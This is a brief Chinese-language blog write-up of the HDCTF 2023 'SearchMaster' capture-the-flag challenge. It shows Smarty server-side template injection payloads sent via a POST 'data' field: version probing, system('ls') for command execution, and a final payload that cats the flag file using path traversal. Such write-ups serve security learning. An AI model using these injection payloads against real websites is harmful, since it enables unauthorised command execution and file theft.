文章 分类 标签 友链 关于

目录

[HDCTF 2023]SearchMaster

 收录于  类别 CTF-WriteUp
     约 191 字   预计阅读 1 分钟 
目录

[HDCTF 2023]SearchMaster

先扫描目录:

https://pic.imgdb.cn/item/658053bec458853aef9d1608.jpg

访问一下 /demo ,从报错信息中得知使用了 Smarty 模板,结合网站首页的提示:YOU CAN POST ME A DATA

用 POST 传值:data={$smarty.version}

https://pic.imgdb.cn/item/65805500c458853aefa2a0ed.jpg

得到版本号,也证实了首页使用的是 Smarty 模板

尝试是否存在 rce :data={system('ls')} ,得到结果

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

composer.json
css
demo
docs
index.php
js
lexer
libs
templates_c
templates_c

省略过程……

最后的 payload :data={system('cat ../../../flag_13_searchmaster')}

更新于 2023-12-18
阅读原始文档
 CTFSmartySSTI
返回 | 主页